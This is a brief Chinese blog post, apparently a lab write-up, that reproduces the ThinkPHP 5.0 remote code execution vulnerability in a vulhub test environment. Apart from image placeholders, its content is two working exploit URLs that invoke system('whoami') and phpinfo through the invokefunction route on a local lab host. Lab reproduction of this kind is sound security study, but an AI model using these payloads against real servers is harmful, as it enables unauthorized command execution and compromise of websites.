vulhub之thinkphp复现

1.搭建环境。
vulhub之thinkphp复现_第1张图片
2.利用thinkphp检测工具扫描出对应的payload,直接上
vulhub之thinkphp复现_第2张图片
vulhub之thinkphp复现_第3张图片
3.针对rce-5.0的payload

http://192.168.2.134:8080/index.php/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
在这里插入代码片?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

在这里插入图片描述

你可能感兴趣的:(自学,web安全)